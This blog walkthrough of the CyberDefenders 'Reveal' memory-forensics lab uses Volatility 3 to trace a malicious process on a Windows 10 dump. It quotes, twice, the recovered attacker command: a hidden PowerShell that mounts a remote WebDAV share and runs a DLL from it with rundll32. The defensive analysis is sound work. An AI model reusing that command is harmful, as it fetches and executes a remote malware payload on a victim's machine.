Reveal Lab Walkthrough

1. Lab preparation

Challenge: Blue team CTF Challenges | Reveal - CyberDefenders Walkthrough Category: Endpoint Forensics

Tactics: Defense Evasion, Discovery

Environment: Kali Linux running in VMware Workstation Pro 17 Tools Used, Volatility 3 (running in Docker)

Reference Materials:

2. Introduction of Volatility

2.1 How Volatility 3 Manages Memory Dumps

Volatility 3 begins by loading the memory dump and automatically identifying the operating system profile. This OS profile enables Volatility to interpret specific memory structures and data layouts unique to that OS version. The tool utilizes symbol tables as comprehensive maps of OS-specific data structures, which are crucial for accurately parsing memory layouts across different OS versions.

2.2 Historical Context and Evolution

Volatility3 represents a significant advancement from its predecessors, with version 1.0.0 released in February 2021. The transition to version 3 brought improved performance and stability, enhanced plugin architecture, better symbol table management, and more efficient memory analysis capabilities. The tool continues to evolve, with the latest version (2.11.0) released in January 2025, adding new plugins and improving analysis capabilities for modern systems and threats.

2.3 Role in Cybersecurity Industry

Volatility3 serves multiple critical roles in cybersecurity. In incident response, it enables rapid threat assessment, malware detection, and system compromise investigation. For digital forensics, it facilitates memory dump analysis, artifact recovery, and timeline reconstruction. In security research, it supports malware behavior analysis, system vulnerability assessment, and threat intelligence gathering.

2.4 Limitations

The tool has several technical constraints, including the requirement for valid memory dumps and correct OS profiles. It depends on symbol table availability and faces challenges with memory corruption handling and incomplete dump analysis. Complex memory structure interpretation can also present difficulties during analysis.

2.5 Memory Acquisition Methods

For Windows systems, memory acquisition is typically performed using tools like WinPMem, FTK Imager, or PowerShell scripts. Linux systems rely on tools such as LiME and AVML. Best practices include verifying dump integrity, documenting the acquisition process, and maintaining chain of custody to ensure the reliability of the analysis results.

3. Basic usage of Volatility on docker

sudo docker container run --entrypoint ash --interactive --tty --volume "$PWD:/lab-192-reveal" --workdir /lab-192-reveal sk4la/volatility3

Essential Flags

--interactive (-i): Keeps STDIN open even after container has detached
--tty (-t): Allocates a pseudo-TTY, providing a proper terminal session
--volume (-v) "$PWD:/lab-192-reveal": Mounts current directory inside container
- Maps your current directory ($PWD) to /lab-192-reveal in the container
- Allows sharing files between host and container
--workdir /lab-192-reveal: Sets the working directory inside the container
- Ensures you start in the mounted volume directory
- Makes navigation more convenient

/lab-192-reveal $ volatility3 --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty --save-config volatile.mem.json windows.info

Essential Flags

--file 192-Reveal.dmp: Specifies the memory dump file to analyze
--log 192-Reveal.dmp.log: Creates a detailed log file and capture all operations and potential warnings
--renderer pretty: Formats output in human-readable text
--save-config volatile.mem.json: Saves analysis configuration for future use, speeds up subsequent analysis by skipping structure detection
windows.info: It’s the Plugin currently used. Displays basic system information

Finding

The system under investigation is Windows 10, with the NT root directory at C:\Windows and a memory capture timestamp of 2024-07-15 07:00:08. These details provide essential context, helping to refine the scope of our analysis and supporting the construction of an accurate timeline if needed.

4. Question

Q1. Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

Based on this logic chain, I need to find malicious process in memory by using volatility3 plugin windows.malfind

My answer:

/lab-192-reveal $ volatility3 --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.malfind

Error

During the waiting period of output, I faced Segmentation fault (core dumped) so that I decide to install and use volatility3 latest version directly on my kali.

git clone https://github.com/volatilityfoundation/volatility3.git

Volatility 3 Framework 2.20.1

## The 192-Reveal.dmp file is located under current directory

─(kali㉿kali)-[~/Documents/volatility3]
python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty  windows.malfind

Q2. Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

(kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty  windows.pstree

Q3: Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty  windows.cmdline

3435.dll

Q4: Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

powershell.exe  -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

davwwwroot

Q5: What is the MITRE ATT&CK sub-technique ID that describes the execution of a second-stage payload using a Windows utility to run the malicious file?

Search Rundll32 on MITRE ATT&CK

Q6: Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

(kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty  windows.getsids.GetSIDs | grep "3692"

elon is the username

Q7: Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?

powershell.exe  -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry

This IPV4 is used by STRELASTEALER

Yunfan Shao

Archive

Tags

Defender’s Insights

Reveal Lab Walkthrough

1. Lab preparation

2. Introduction of Volatility

2.1 How Volatility 3 Manages Memory Dumps

2.2 Historical Context and Evolution

2.3 Role in Cybersecurity Industry

2.4 Limitations

2.5 Memory Acquisition Methods

3. Basic usage of Volatility on docker

4. Question

Q1. Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

My answer:

Error

Q2. Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

Q3: Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

Q4: Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

Q5: What is the MITRE ATT&CK sub-technique ID that describes the execution of a second-stage payload using a Windows utility to run the malicious file?

Q6: Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

Q7: Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?

Yunfan Shao

Archive

Subscribe

Sites I Like

Tags

Defender’s Insights

Reveal Lab Walkthrough

1. Lab preparation

2. Introduction of Volatility

2.1 How Volatility 3 Manages Memory Dumps

2.2 Historical Context and Evolution

2.3 Role in Cybersecurity Industry

2.4 Limitations

2.5 Memory Acquisition Methods

3. Basic usage of Volatility on docker

4. Question

Q1. Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?

My answer:

Error

Q2. Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?

Q3: Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?

Q4: Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?

Q5: What is the MITRE ATT&CK sub-technique ID that describes the execution of a second-stage payload using a Windows utility to run the malicious file?

Q6: Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?

Q7: Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?